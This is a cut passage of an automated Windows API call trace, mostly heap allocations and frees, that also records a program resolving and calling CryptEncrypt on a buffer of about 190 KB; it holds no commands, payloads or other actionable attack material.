RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0162.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0162.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0162.314] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0162.314] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0162.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0162.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0162.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0162.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0162.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0162.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0162.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0162.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3bf0050 [0162.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0162.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0162.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0162.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0162.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0162.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0162.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0162.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0162.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0162.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.330] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0162.331] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2f600, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2f608) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0162.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 